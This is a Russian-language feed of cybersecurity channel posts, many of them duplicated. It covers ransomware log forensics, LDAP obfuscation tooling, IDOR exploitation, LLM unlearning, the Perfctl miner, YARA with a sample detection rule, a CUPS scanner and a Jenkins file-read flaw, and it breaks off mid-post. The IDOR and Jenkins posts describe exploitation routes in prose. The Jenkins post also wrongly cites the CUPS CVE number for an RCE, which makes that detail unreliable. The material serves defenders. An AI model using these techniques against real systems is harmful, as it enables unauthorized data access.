🔍 Как обнаружить атаки программ-вымогателей с помощью анализа журналов Windows?
🛡️ Специалисты из JPCERT провели исследование, позволяющее выявлять атаки программ-вымогателей, анализируя журналы событий Windows. Одной из главных сложностей в этом процессе является определение вектора проникновения злоумышленников.
⏳ Часто анализ уязвимостей, таких как VPN-устройства, занимает значительное время, особенно при множестве потенциальных путей атак. Эффективное обнаружение начинается с определения группы злоумышленников по оставленным на заражённом устройстве шифрованным файлам и записям с требованиями выкупа.
❗ Однако эксперты подчеркивают, что не всегда удаётся идентифицировать атаку по таким артефактам. Поэтому они решили исследовать, можно ли использовать данные из журналов событий Windows для определения типа программ-вымогателей.
📊 В ходе исследования было установлено, что некоторые вымогатели оставляют характерные следы в журналах событий Windows. Анализировались четыре основных журнала: Application Log, Security Log, System Log и Setup Log, а также несколько семейств программ-вымогателей.
💻 Conti
Первая обнаруженная программа-вымогатель, Conti, появилась в 2020 году. В 2022 году её исходный код утек, что привело к появлению множества модификаций. При шифровании файлов Conti использует функцию Restart Manager, что генерирует множество событий (ID: 10000, 10001) за короткий промежуток времени. Похожие события фиксируются и в системных логах других программ, связанных с Conti, таких как Akira, Lockbit3.0 и Abysslocker.
🔒 Phobos
Phobos, выявленный в 2019 году, способен удалять копии томов и каталоги системных резервных копий, оставляя характерные следы:
- ID 612: автоматический бэкап отменён.
- ID 524: системный каталог удалён.
- ID 753: система бэкапа успешно запущена.
📋 Общие признаки в логах
Особое внимание стоит уделить таким вымогателям, как Shade и GandCrab, которые оставляют общие следы в логах событий (ID: 13, 10016), указывающие на проблемы с доступом к COM-серверу, связанным с Volume Shadow Copy Service.
⚠️ К сожалению, исследователи не смогли найти чёткие признаки в логах событий для более старых программ-вымогателей, таких как WannaCry и Ryuk. Тем не менее, выявление закономерностей в логах может значительно ускорить процесс обнаружения заражений.
🔎 Классификация данных журналов событий Windows открывает новые горизонты в борьбе с киберпреступностью, демонстрируя, что даже самые хитроумные злоумышленники оставляют цифровые следы.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #вымогатели #JPCERT #SecureTechTalks #защитаинформации
🛡️ Специалисты из JPCERT провели исследование, позволяющее выявлять атаки программ-вымогателей, анализируя журналы событий Windows. Одной из главных сложностей в этом процессе является определение вектора проникновения злоумышленников.
⏳ Часто анализ уязвимостей, таких как VPN-устройства, занимает значительное время, особенно при множестве потенциальных путей атак. Эффективное обнаружение начинается с определения группы злоумышленников по оставленным на заражённом устройстве шифрованным файлам и записям с требованиями выкупа.
❗ Однако эксперты подчеркивают, что не всегда удаётся идентифицировать атаку по таким артефактам. Поэтому они решили исследовать, можно ли использовать данные из журналов событий Windows для определения типа программ-вымогателей.
📊 В ходе исследования было установлено, что некоторые вымогатели оставляют характерные следы в журналах событий Windows. Анализировались четыре основных журнала: Application Log, Security Log, System Log и Setup Log, а также несколько семейств программ-вымогателей.
💻 Conti
Первая обнаруженная программа-вымогатель, Conti, появилась в 2020 году. В 2022 году её исходный код утек, что привело к появлению множества модификаций. При шифровании файлов Conti использует функцию Restart Manager, что генерирует множество событий (ID: 10000, 10001) за короткий промежуток времени. Похожие события фиксируются и в системных логах других программ, связанных с Conti, таких как Akira, Lockbit3.0 и Abysslocker.
🔒 Phobos
Phobos, выявленный в 2019 году, способен удалять копии томов и каталоги системных резервных копий, оставляя характерные следы:
- ID 612: автоматический бэкап отменён.
- ID 524: системный каталог удалён.
- ID 753: система бэкапа успешно запущена.
📋 Общие признаки в логах
Особое внимание стоит уделить таким вымогателям, как Shade и GandCrab, которые оставляют общие следы в логах событий (ID: 13, 10016), указывающие на проблемы с доступом к COM-серверу, связанным с Volume Shadow Copy Service.
⚠️ К сожалению, исследователи не смогли найти чёткие признаки в логах событий для более старых программ-вымогателей, таких как WannaCry и Ryuk. Тем не менее, выявление закономерностей в логах может значительно ускорить процесс обнаружения заражений.
🔎 Классификация данных журналов событий Windows открывает новые горизонты в борьбе с киберпреступностью, демонстрируя, что даже самые хитроумные злоумышленники оставляют цифровые следы.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #вымогатели #JPCERT #SecureTechTalks #защитаинформации
❤1
🛠 MaLDAPtive: инструмент для работы с LDAP 🛠
MaLDAPtive — открытый фреймворк для работы с LDAP, который включает парсинг, обфускацию, деобфускацию и обнаружение SearchFilter LDAP.
🔍 В основе проекта лежит кастомный LDAP парсер на C#, разработанный для токенизации и синтаксического анализа. Он включает специализированные настройки для точной обфускации и деобфускации LDAP SearchFilters.
💻 Для удобства использования разработана PowerShell-обёртка, которая поддерживает гибкость, рандомизацию и может интегрировать все функции в одну команду.
📂 Проект доступен на GitHub бесплатно, но с одним нюансом: в рамках первой стадии публикации выложен весь код, кроме модуля обфускации. Вторую часть кода, вместе с модулем обфускации, разработчики планируют выпустить через 4 месяца.
🖥 Интерактивный режим MaLDAPtive — это красочное меню с поддержкой регулярных выражений и базовых подстановок. С его помощью можно легко исследовать все функции и экспортировать результаты в виде команд одной строкой.
⚙️ Команда FIND-EVIL генерирует отчёт по текущему обфусцированному LDAP SearchFilter за считанные миллисекунды, а также предоставляет полный отчёт по обнаруженным угрозам.
📊 Дополнительно разработчики опубликовали набор из 1,337 обфусцированных LDAP SearchFilters в качестве примеров.
🔗 Не забудьте заглянуть в GitHub!
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #LDAP #MaLDAPtive #обфускация #защитаинформации
MaLDAPtive — открытый фреймворк для работы с LDAP, который включает парсинг, обфускацию, деобфускацию и обнаружение SearchFilter LDAP.
🔍 В основе проекта лежит кастомный LDAP парсер на C#, разработанный для токенизации и синтаксического анализа. Он включает специализированные настройки для точной обфускации и деобфускации LDAP SearchFilters.
💻 Для удобства использования разработана PowerShell-обёртка, которая поддерживает гибкость, рандомизацию и может интегрировать все функции в одну команду.
📂 Проект доступен на GitHub бесплатно, но с одним нюансом: в рамках первой стадии публикации выложен весь код, кроме модуля обфускации. Вторую часть кода, вместе с модулем обфускации, разработчики планируют выпустить через 4 месяца.
🖥 Интерактивный режим MaLDAPtive — это красочное меню с поддержкой регулярных выражений и базовых подстановок. С его помощью можно легко исследовать все функции и экспортировать результаты в виде команд одной строкой.
⚙️ Команда FIND-EVIL генерирует отчёт по текущему обфусцированному LDAP SearchFilter за считанные миллисекунды, а также предоставляет полный отчёт по обнаруженным угрозам.
📊 Дополнительно разработчики опубликовали набор из 1,337 обфусцированных LDAP SearchFilters в качестве примеров.
🔗 Не забудьте заглянуть в GitHub!
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #LDAP #MaLDAPtive #обфускация #защитаинформации
❤1
💻 Что такое уязвимости IDOR и как их эксплуатировать?
IDOR (Insecure Direct Object Reference) — это уязвимость, возникающая при неправильной проверке доступа к объектам данных в веб-приложениях или API. Злоумышленники могут напрямую обращаться к данным без должных прав, если приложение не проверяет владельца объекта. Такие данные могут быть любыми: от записей в базе данных до файлов на сервере.
🔑 Как возникают уязвимости IDOR? Часто уязвимость появляется, когда разработчики используют предсказуемые идентификаторы, например, числовые значения. Если веб-приложение позволяет пользователям взаимодействовать с этими идентификаторами без должной проверки, можно получить доступ к данным, которые должны быть закрыты.
⚙️ Как выявить уязвимость IDOR? Для поиска таких уязвимостей важно проверять, как веб-приложение обрабатывает идентификаторы объектов. Тестирование следует проводить не только для основных функций, но и для менее очевидных компонентов, например, автосохранения или черновиков.
🛠 Эксплуатация IDOR-уязвимостей Один из основных методов эксплуатации — изменение предсказуемого идентификатора. Например, замена числового значения на другое может позволить злоумышленнику получить доступ к чужим данным. Дополнительно можно использовать методы загрязнения параметров, JSON globbing или менять метод запроса для обхода проверок доступа.
📊 Вторичные уязвимости сложнее обнаружить, так как они возникают, когда идентификатор сохраняется для последующего использования. Примером может служить задача экспорта данных, когда идентификатор сохраняется и позже используется для генерации отчёта без дополнительных проверок прав доступа.
🚨 Несмотря на то, что IDOR-уязвимости могут показаться простыми для обнаружения, они часто требуют глубокого анализа и нестандартных подходов.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #IDOR #уязвимости #SecureTechTalks #багбаунти #обфускация
IDOR (Insecure Direct Object Reference) — это уязвимость, возникающая при неправильной проверке доступа к объектам данных в веб-приложениях или API. Злоумышленники могут напрямую обращаться к данным без должных прав, если приложение не проверяет владельца объекта. Такие данные могут быть любыми: от записей в базе данных до файлов на сервере.
🔑 Как возникают уязвимости IDOR? Часто уязвимость появляется, когда разработчики используют предсказуемые идентификаторы, например, числовые значения. Если веб-приложение позволяет пользователям взаимодействовать с этими идентификаторами без должной проверки, можно получить доступ к данным, которые должны быть закрыты.
⚙️ Как выявить уязвимость IDOR? Для поиска таких уязвимостей важно проверять, как веб-приложение обрабатывает идентификаторы объектов. Тестирование следует проводить не только для основных функций, но и для менее очевидных компонентов, например, автосохранения или черновиков.
🛠 Эксплуатация IDOR-уязвимостей Один из основных методов эксплуатации — изменение предсказуемого идентификатора. Например, замена числового значения на другое может позволить злоумышленнику получить доступ к чужим данным. Дополнительно можно использовать методы загрязнения параметров, JSON globbing или менять метод запроса для обхода проверок доступа.
📊 Вторичные уязвимости сложнее обнаружить, так как они возникают, когда идентификатор сохраняется для последующего использования. Примером может служить задача экспорта данных, когда идентификатор сохраняется и позже используется для генерации отчёта без дополнительных проверок прав доступа.
🚨 Несмотря на то, что IDOR-уязвимости могут показаться простыми для обнаружения, они часто требуют глубокого анализа и нестандартных подходов.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #IDOR #уязвимости #SecureTechTalks #багбаунти #обфускация
❤1😢1
🧠 Как удалить нежелательные знания из языковых моделей?
Исследователи из Northeastern University разработали новый метод под названием Erasure of Language Memory (ELM), который позволяет языковым моделям «разучивать» определенные концепции, не теряя при этом своих ключевых способностей.
💻 Представьте, что вы хотите, чтобы модель забыла, как генерировать информацию по опасным темам (например, как создать биологическое оружие). При этом важно, чтобы модель не выдавала бессвязный текст и продолжала правильно работать с другими задачами.
🔍 ELM использует специальные методы низкорангового обновления модели, которые изменяют вероятности выдачи определённых текстов. Таким образом, модель теряет «память» о нежелательных темах, сохраняя свою общую функциональность.
🔥 Данный метод уже показал свою эффективность в тестах кибербезопасности. Он сохраняет высокую точность на безопасных темах, но выдаёт случайные ответы на вопросы по удалённым концепциям.
📊 Преимущества ELM:
- Полное удаление нежелательных знаний (например, о вредоносных концепциях).
- Сохранение общей производительности модели.
- Устойчивость к атакам злоумышленников.
Разработанный подход открывает новые горизонты в безопасности и контроле языковых моделей, снижая риск генерации опасной информации.
🔗 Подробнее о ELM можно прочитать в полном тексте исследования.
Stay secure and read SecureTechTalks 📚
#SecureTechTalks #кибербезопасность #AI #LLM #безопасность
Исследователи из Northeastern University разработали новый метод под названием Erasure of Language Memory (ELM), который позволяет языковым моделям «разучивать» определенные концепции, не теряя при этом своих ключевых способностей.
💻 Представьте, что вы хотите, чтобы модель забыла, как генерировать информацию по опасным темам (например, как создать биологическое оружие). При этом важно, чтобы модель не выдавала бессвязный текст и продолжала правильно работать с другими задачами.
🔍 ELM использует специальные методы низкорангового обновления модели, которые изменяют вероятности выдачи определённых текстов. Таким образом, модель теряет «память» о нежелательных темах, сохраняя свою общую функциональность.
🔥 Данный метод уже показал свою эффективность в тестах кибербезопасности. Он сохраняет высокую точность на безопасных темах, но выдаёт случайные ответы на вопросы по удалённым концепциям.
📊 Преимущества ELM:
- Полное удаление нежелательных знаний (например, о вредоносных концепциях).
- Сохранение общей производительности модели.
- Устойчивость к атакам злоумышленников.
Разработанный подход открывает новые горизонты в безопасности и контроле языковых моделей, снижая риск генерации опасной информации.
🔗 Подробнее о ELM можно прочитать в полном тексте исследования.
Stay secure and read SecureTechTalks 📚
#SecureTechTalks #кибербезопасность #AI #LLM #безопасность
👍1
📧 Rspamd: инструмент фильтрации спама для электронной почты
Rspamd — это ПО с открытым исходным кодом, предназначеное для фильтрации спама. Решение использует разнообразные правила для анализа сообщений, включая регулярки, статистический анализ и интеграции с сервисами чёрных списков URL.
🔍 Rspamd анализирует каждое сообщение и присваивает ему вердикт, который может быть использован MTA (Mail Transfer Agent) для дальнейших действий: отклонение сообщения, добавление заголовка "спам" и другие операции. Кроме того, система может проверить DKIM-подписи, что значительно улучшает безопасность электронной почты.
⚙️ Основные возможности:
- Поддержка интеграции с популярными MTA-системами (Postfix, Sendmail) через Milter.
- Обработка сотен сообщений в секунду.
- Встроенные модули для фильтрации спама и обширное API на Lua для создания собственных правил.
- Асинхронное взаимодействие с внешними сервисами (DNS, HTTP, TCP/UDP).
📂 Rspamd имеет лицензию Apache 2.0. Полный набор модулей и документация доступны на официальном сайте.
🔗 Ссылка на GitHub
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #спам #Rspamd #почта #безопасность
Rspamd — это ПО с открытым исходным кодом, предназначеное для фильтрации спама. Решение использует разнообразные правила для анализа сообщений, включая регулярки, статистический анализ и интеграции с сервисами чёрных списков URL.
🔍 Rspamd анализирует каждое сообщение и присваивает ему вердикт, который может быть использован MTA (Mail Transfer Agent) для дальнейших действий: отклонение сообщения, добавление заголовка "спам" и другие операции. Кроме того, система может проверить DKIM-подписи, что значительно улучшает безопасность электронной почты.
⚙️ Основные возможности:
- Поддержка интеграции с популярными MTA-системами (Postfix, Sendmail) через Milter.
- Обработка сотен сообщений в секунду.
- Встроенные модули для фильтрации спама и обширное API на Lua для создания собственных правил.
- Асинхронное взаимодействие с внешними сервисами (DNS, HTTP, TCP/UDP).
📂 Rspamd имеет лицензию Apache 2.0. Полный набор модулей и документация доступны на официальном сайте.
🔗 Ссылка на GitHub
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #спам #Rspamd #почта #безопасность
❤1
💻 Масштабная атака на Linux: криптомайнер "Perfctl" 💻
Исследователи из Aqua Security обнаружили новую волну атак на Linux-системы с использованием скрытного вредоносного ПО под названием "Perfctl". ПО заражает тысячи систем, заставляя их работать на майнинг криптовалюты Monero (через XMRIG), а в некоторых случаях также используется для proxy-jacking.
🔍 Что такое "Perfctl"? Название вируса происходит от названия процесса, созданного на заражённых системах. "Perf" указывает на стандартный инструмент мониторинга производительности в Linux, а "ctl" подразумевает управление в командной строке. Это делает вредоносный процесс менее заметным для администраторов при поверхностной проверке.
🚨 Хакеры используют известные уязвимости, например CVE-2021-4034 (PwnKit), и ошибки конфигурации, чтобы установить вирус. Он копирует себя в несколько системных директорий, изменяет скрипты для сокрытия своей активности, устанавливает руткиты для обеспечения скрытности и перехвата сетевого трафика, а также запускает XMRIG для майнинга.
📉 Одной из ключевых особенностей Perfctl является его способность "прятаться". Он временно останавливает все майнинговые процессы, как только новый пользователь входит в систему, что затрудняет его обнаружение.
🔧 Чтобы выявить Perfctl, необходимо проверять системные процессы, журналы и сетевой трафик. Aqua Security поделились индикаторами компрометации и советами по устранению угрозы.
🛡️ Если ваша система используется для криптомайнинга без вашего ведома, это не просто вопрос производительности. Вредоносное ПО может служить бэкдором для установки других вирусов, что ставит под угрозу всю инфраструктуру.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #Linux #SecureTechTalks #cryptomining #Perfctl #информационнаябезопасность
Исследователи из Aqua Security обнаружили новую волну атак на Linux-системы с использованием скрытного вредоносного ПО под названием "Perfctl". ПО заражает тысячи систем, заставляя их работать на майнинг криптовалюты Monero (через XMRIG), а в некоторых случаях также используется для proxy-jacking.
🔍 Что такое "Perfctl"? Название вируса происходит от названия процесса, созданного на заражённых системах. "Perf" указывает на стандартный инструмент мониторинга производительности в Linux, а "ctl" подразумевает управление в командной строке. Это делает вредоносный процесс менее заметным для администраторов при поверхностной проверке.
🚨 Хакеры используют известные уязвимости, например CVE-2021-4034 (PwnKit), и ошибки конфигурации, чтобы установить вирус. Он копирует себя в несколько системных директорий, изменяет скрипты для сокрытия своей активности, устанавливает руткиты для обеспечения скрытности и перехвата сетевого трафика, а также запускает XMRIG для майнинга.
📉 Одной из ключевых особенностей Perfctl является его способность "прятаться". Он временно останавливает все майнинговые процессы, как только новый пользователь входит в систему, что затрудняет его обнаружение.
🔧 Чтобы выявить Perfctl, необходимо проверять системные процессы, журналы и сетевой трафик. Aqua Security поделились индикаторами компрометации и советами по устранению угрозы.
🛡️ Если ваша система используется для криптомайнинга без вашего ведома, это не просто вопрос производительности. Вредоносное ПО может служить бэкдором для установки других вирусов, что ставит под угрозу всю инфраструктуру.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #Linux #SecureTechTalks #cryptomining #Perfctl #информационнаябезопасность
❤1
🔍 YARA: инструмент для исследования вредоносного ПО 🔍
YARA — один из самых известных инструмент с открытым исходным кодом, предназначенный для помощи исследователям в выявлении и классификации образцов вредоносного ПО.
🧠 Функциональность
С помощью YARA можно создавать детальные описания (правила) для выявления вредоносных программ на основе текстовых или бинарных шаблонов. Каждое правило состоит из набора строк и логического выражения, которое определяет критерии его срабатывания.
💻 Поддержка платформ
YARA работает на Windows, Linux и macOS, и его можно использовать через интерфейс командной строки или интегрировать с Python-скриптами с помощью расширения yara-python.
📂 Сканирование архивов
Для работы с архивами (.zip, .tar) используйтся расширение yextend, разработанное Bayshore Networks, которое значительно расширяет возможности YARA.
🔧 Пример правила:
🔗 Дополнительные ресурсы
Если вы храните свои правила YARA на GitHub, то приложение YARA-CI поможет вам проверять их на наличие ошибок и ложных срабатываний в режиме непрерывного тестирования.
Более того, команда InQuest собрала полезную коллекцию ресурсов, связанных с YARA.
🔗 YARA доступен на GitHub. Используйте его для повышения безопасности ваших систем и исследования вредоносного ПО!
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #YARA #вредоносноеПО #информационнаябезопасность
YARA — один из самых известных инструмент с открытым исходным кодом, предназначенный для помощи исследователям в выявлении и классификации образцов вредоносного ПО.
🧠 Функциональность
С помощью YARA можно создавать детальные описания (правила) для выявления вредоносных программ на основе текстовых или бинарных шаблонов. Каждое правило состоит из набора строк и логического выражения, которое определяет критерии его срабатывания.
💻 Поддержка платформ
YARA работает на Windows, Linux и macOS, и его можно использовать через интерфейс командной строки или интегрировать с Python-скриптами с помощью расширения yara-python.
📂 Сканирование архивов
Для работы с архивами (.zip, .tar) используйтся расширение yextend, разработанное Bayshore Networks, которое значительно расширяет возможности YARA.
🔧 Пример правила:
rule silent_banker : banker
{
meta:
denoscription = "Пример правила"
threat_level = 3
in_the_wild = true
strings:
$a = {6A 40 68 00 30 00 00 6A 14 8D 91}
$b = {8D 4D B0 2B C1 83 C0 27 99 6A 4E 59 F7 F9}
$c = "UVODFRYSIHLNWPEJXQZAKCBGMT"
condition:
$a or $b or $c
}
🔗 Дополнительные ресурсы
Если вы храните свои правила YARA на GitHub, то приложение YARA-CI поможет вам проверять их на наличие ошибок и ложных срабатываний в режиме непрерывного тестирования.
Более того, команда InQuest собрала полезную коллекцию ресурсов, связанных с YARA.
🔗 YARA доступен на GitHub. Используйте его для повышения безопасности ваших систем и исследования вредоносного ПО!
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #YARA #вредоносноеПО #информационнаябезопасность
❤1
🛡️ Оперативно находим уязвимые для RCE и DDoS сервера
Исследователь кибербезопасности Маркус Хитчинс представил автоматизированный сканер для поиска уязвимых серверов на Linux и UNIX, которые могут быть атакованы через уязвимость CUPS (CVE-2024-47176). Инструмент упрощает задачу системных администраторов по обнаружению устройств с активированной службой cups-browsed, которая подвержена риску удалённого выполнения кода (RCE).
🔍 Уязвимость впервые была выявлена исследователем безопасности Симоне Маргарителли и получила внимание в прошлом месяце. Несмотря на то, что риск эксплуатации RCE в реальной среде оценивается как ограниченный, специалисты из Akamai отметили, что уязвимость может использоваться для усиления DDoS-атак.
⚙️ Суть проблемы:
Служба cups-browsed открывает порт управления (UDP 631) для любого сетевого интерфейса, что делает его доступным для всех систем в сети. Без должной аутентификации злоумышленники могут отправлять команды через данный порт.
🔧 Как работает сканер? Сканер, разработанный Хитчинсом, написан на Python и сканирует локальные сети, помогая выявлять устройства с уязвимыми версиями CUPS. Даже если порт защищён снаружи брандмауэром, он может быть доступен внутри сети, что создаёт риск для повышения привилегий и бокового перемещения.
📊 Результаты сохраняются в двух логах: первый включает IP-адреса и версии CUPS уязвимых устройств, второй — информацию об отправленных HTTP-запросах для дальнейшего анализа.
🛠 Использование сканера может помочь системным администраторам оперативно планировать патчинг и снижать риски эксплуатации уязвимости CVE-2024-47176.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #CVE2024 #Linux #информационнаябезопасность #CUPS
Исследователь кибербезопасности Маркус Хитчинс представил автоматизированный сканер для поиска уязвимых серверов на Linux и UNIX, которые могут быть атакованы через уязвимость CUPS (CVE-2024-47176). Инструмент упрощает задачу системных администраторов по обнаружению устройств с активированной службой cups-browsed, которая подвержена риску удалённого выполнения кода (RCE).
🔍 Уязвимость впервые была выявлена исследователем безопасности Симоне Маргарителли и получила внимание в прошлом месяце. Несмотря на то, что риск эксплуатации RCE в реальной среде оценивается как ограниченный, специалисты из Akamai отметили, что уязвимость может использоваться для усиления DDoS-атак.
⚙️ Суть проблемы:
Служба cups-browsed открывает порт управления (UDP 631) для любого сетевого интерфейса, что делает его доступным для всех систем в сети. Без должной аутентификации злоумышленники могут отправлять команды через данный порт.
🔧 Как работает сканер? Сканер, разработанный Хитчинсом, написан на Python и сканирует локальные сети, помогая выявлять устройства с уязвимыми версиями CUPS. Даже если порт защищён снаружи брандмауэром, он может быть доступен внутри сети, что создаёт риск для повышения привилегий и бокового перемещения.
📊 Результаты сохраняются в двух логах: первый включает IP-адреса и версии CUPS уязвимых устройств, второй — информацию об отправленных HTTP-запросах для дальнейшего анализа.
🛠 Использование сканера может помочь системным администраторам оперативно планировать патчинг и снижать риски эксплуатации уязвимости CVE-2024-47176.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #CVE2024 #Linux #информационнаябезопасность #CUPS
❤1
🛡️ Минцифры готовит новые правила для российских аналогов GitHub 🛡️
11 октября 2024 года стало известно, что Минцифры разрабатывает единые требования по безопасности для отечественных хранилищ исходного кода, таких как российские аналоги GitHub. Ведомство решило отказаться от идеи создания единого национального репозитория открытого кода.
💡 Что планируется?
Вместо единого репозитория, Минцифры готовит документ, который определит стандарты для всех российских хранилищ кода. Об этом сообщил Илья Массух, директор Центра компетенций по импортозамещению в сфере ИКТ. В документе будут включены единые требования по кибербезопасности для всех отечественных репозиториев.
🔍 Новая концепция
Согласно Минцифры, совместно с другими организациями ведётся работа над созданием экосистемы хранилищ, находящихся под юрисдикцией РФ. Главной задачей станет обеспечение безопасности данных и защиты от кибератак.
👥 Мнение экспертов
Алексей Смирнов, глава совета директоров "Базальт СПО", считает, что единый российский репозиторий свободного ПО был бы лишён смысла, так как уже существует множество частных хранилищ. Он предложил идею создания "репозитория репозиториев", который объединит существующие платформы.
Николай Сокорнов, директор департамента разработки ПО компании «Рексофт», поддерживает решение отказаться от единого репозитория, отметив, что распределённые системы хранения более надёжны с точки зрения безопасности.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #Минцифры #Россия #репозиторий #GitHub #информационнаябезопасность
11 октября 2024 года стало известно, что Минцифры разрабатывает единые требования по безопасности для отечественных хранилищ исходного кода, таких как российские аналоги GitHub. Ведомство решило отказаться от идеи создания единого национального репозитория открытого кода.
💡 Что планируется?
Вместо единого репозитория, Минцифры готовит документ, который определит стандарты для всех российских хранилищ кода. Об этом сообщил Илья Массух, директор Центра компетенций по импортозамещению в сфере ИКТ. В документе будут включены единые требования по кибербезопасности для всех отечественных репозиториев.
🔍 Новая концепция
Согласно Минцифры, совместно с другими организациями ведётся работа над созданием экосистемы хранилищ, находящихся под юрисдикцией РФ. Главной задачей станет обеспечение безопасности данных и защиты от кибератак.
👥 Мнение экспертов
Алексей Смирнов, глава совета директоров "Базальт СПО", считает, что единый российский репозиторий свободного ПО был бы лишён смысла, так как уже существует множество частных хранилищ. Он предложил идею создания "репозитория репозиториев", который объединит существующие платформы.
Николай Сокорнов, директор департамента разработки ПО компании «Рексофт», поддерживает решение отказаться от единого репозитория, отметив, что распределённые системы хранения более надёжны с точки зрения безопасности.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #Минцифры #Россия #репозиторий #GitHub #информационнаябезопасность
❤1
🛡️ Ubuntu 24.10 Oracular Oriole: новые меры безопасности и улучшения 🛡️
Canonical выпустила версию Ubuntu 24.10 Oracular Oriole, которая включает обновлённое ядро, новые инструменты для разработчиков и обновление GNOME 47. Одним из ключевых нововведений стали расширенные меры безопасности.
📌 Усиленные меры безопасности
Одним из главных нововведений стал экспериментальный функционал для контроля прав доступа. Теперь пользователи могут детально управлять разрешениями приложений, используя систему AppArmor. Решение обеспечивает контроль над доступом приложений к системным ресурсам, требуя явного разрешения от пользователя выполнения определённых действий.
Функционал можно активировать через Security Center в Ubuntu 24.10, который будет постепенно расширяться новыми опциями для управления файерволом и шифрованием.
💻 Поддержка расширенных инструментов для разработки
В новой версии Ubuntu представлена поддержка последних версий Python, Java, Go, C++, Rust, а также .Net, который теперь доступен на архитектуре ppc64el. Разработчики могут выбирать нужные версии инструментов, включая версии Rust, доступные в архиве.
Java-пакеты OpenJDK 17 и OpenJDK 21 получили сертификацию TCK, что гарантирует соответствие спецификациям Java SE.
🔑 Valkey — новый инструмент для работы с данными
В Ubuntu 24.10 интегрирован Valkey — высокопроизводительное хранилище key/value с открытым исходным кодом. Инструмент подходит для различных задач, в том числе для кэширования запросов и управление очередями.
💡 Новые возможности с GNOME 47
Новая версия GNOME 47 предлагает улучшенную производительность и стабильность. Wayland теперь используется по умолчанию для систем с NVIDIA, а обновления через Snap стали более прозрачными благодаря уведомлениям в App Center и Ubuntu Dock.
🔗 Детали обновления можно прочитать в release notes. Ссылка для скачивания дистрибутива тут.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #Ubuntu #Linux #информационнаябезопасность #GNOME
Canonical выпустила версию Ubuntu 24.10 Oracular Oriole, которая включает обновлённое ядро, новые инструменты для разработчиков и обновление GNOME 47. Одним из ключевых нововведений стали расширенные меры безопасности.
📌 Усиленные меры безопасности
Одним из главных нововведений стал экспериментальный функционал для контроля прав доступа. Теперь пользователи могут детально управлять разрешениями приложений, используя систему AppArmor. Решение обеспечивает контроль над доступом приложений к системным ресурсам, требуя явного разрешения от пользователя выполнения определённых действий.
Функционал можно активировать через Security Center в Ubuntu 24.10, который будет постепенно расширяться новыми опциями для управления файерволом и шифрованием.
💻 Поддержка расширенных инструментов для разработки
В новой версии Ubuntu представлена поддержка последних версий Python, Java, Go, C++, Rust, а также .Net, который теперь доступен на архитектуре ppc64el. Разработчики могут выбирать нужные версии инструментов, включая версии Rust, доступные в архиве.
Java-пакеты OpenJDK 17 и OpenJDK 21 получили сертификацию TCK, что гарантирует соответствие спецификациям Java SE.
🔑 Valkey — новый инструмент для работы с данными
В Ubuntu 24.10 интегрирован Valkey — высокопроизводительное хранилище key/value с открытым исходным кодом. Инструмент подходит для различных задач, в том числе для кэширования запросов и управление очередями.
💡 Новые возможности с GNOME 47
Новая версия GNOME 47 предлагает улучшенную производительность и стабильность. Wayland теперь используется по умолчанию для систем с NVIDIA, а обновления через Snap стали более прозрачными благодаря уведомлениям в App Center и Ubuntu Dock.
🔗 Детали обновления можно прочитать в release notes. Ссылка для скачивания дистрибутива тут.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #Ubuntu #Linux #информационнаябезопасность #GNOME
❤1👍1
🛡️ Уязвимость в Jenkins: произвольное чтение файлов (CVE-2024-43044) 🛡️
Команда разработчиков Jenkins опубликовала заключение (SECURITY-3430 / CVE-2024-43044), в котором описана уязвимость, позволяющая агентам получать доступ к файлам на контроллере Jenkins. Проблема кроется в механизме передачи JAR-файлов от контроллера к агентам. Как выяснилось, реализация метода ClassLoaderProxy#fetchJar на контроллере не ограничивает доступные пути, что позволяет агентам запрашивать любые файлы с файловой системы контроллера.
📂 Эксплуатация уязвимости
Эксплойт использует доступ к классу hudson.remoting.RemoteClassLoader, который отвечает за загрузку классов через удалённые узлы. Агенты могут воспользоваться этой уязвимостью через fetchJar, что даёт им возможность удалённого выполнения кода (RCE) или получения доступа к конфиденциальным данным.
🔧 Патч и защита
Для устранения уязвимости разработчики ввели валидатор и несколько системных свойств Java. Например:
- jenkins.security.s2m.JarURLValidatorImpl.REJECT_ALL — блокирует любые попытки загрузки JAR-файлов.
- hudson.remoting.Channel.DISABLE_JAR_URL_VALIDATOR — отключает проверку валидности URL.
Валидатор проверяет, соответствует ли запрашиваемый JAR-файл допустимым плагинам или файлам ядра. Полный текст изменений можно найти в репозитории Jenkins на GitHub.
⚠️ Риски и эксплуатация
Для реализации атаки злоумышленнику потребуется доступ к агентам Jenkins. Это может быть достигнуто через компрометированные учетные данные или прямое подключение к процессам агента.
Способы эксплуатации включают:
- Использование секрета агента для подключения к контроллеру Jenkins;
- Подключение к уже работающему процессу Remoting через Java API.
Этот недостаток также может быть использован для получения удалённого выполнения кода (RCE), что подтверждается ещё одной рекомендацией, выпущенной ранее в 2024 году. Подробнее о RCE можно прочитать в отчёте CVE-2024-47176.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #Jenkins #уязвимость #информационнаябезопасность #CVE2024
Команда разработчиков Jenkins опубликовала заключение (SECURITY-3430 / CVE-2024-43044), в котором описана уязвимость, позволяющая агентам получать доступ к файлам на контроллере Jenkins. Проблема кроется в механизме передачи JAR-файлов от контроллера к агентам. Как выяснилось, реализация метода ClassLoaderProxy#fetchJar на контроллере не ограничивает доступные пути, что позволяет агентам запрашивать любые файлы с файловой системы контроллера.
📂 Эксплуатация уязвимости
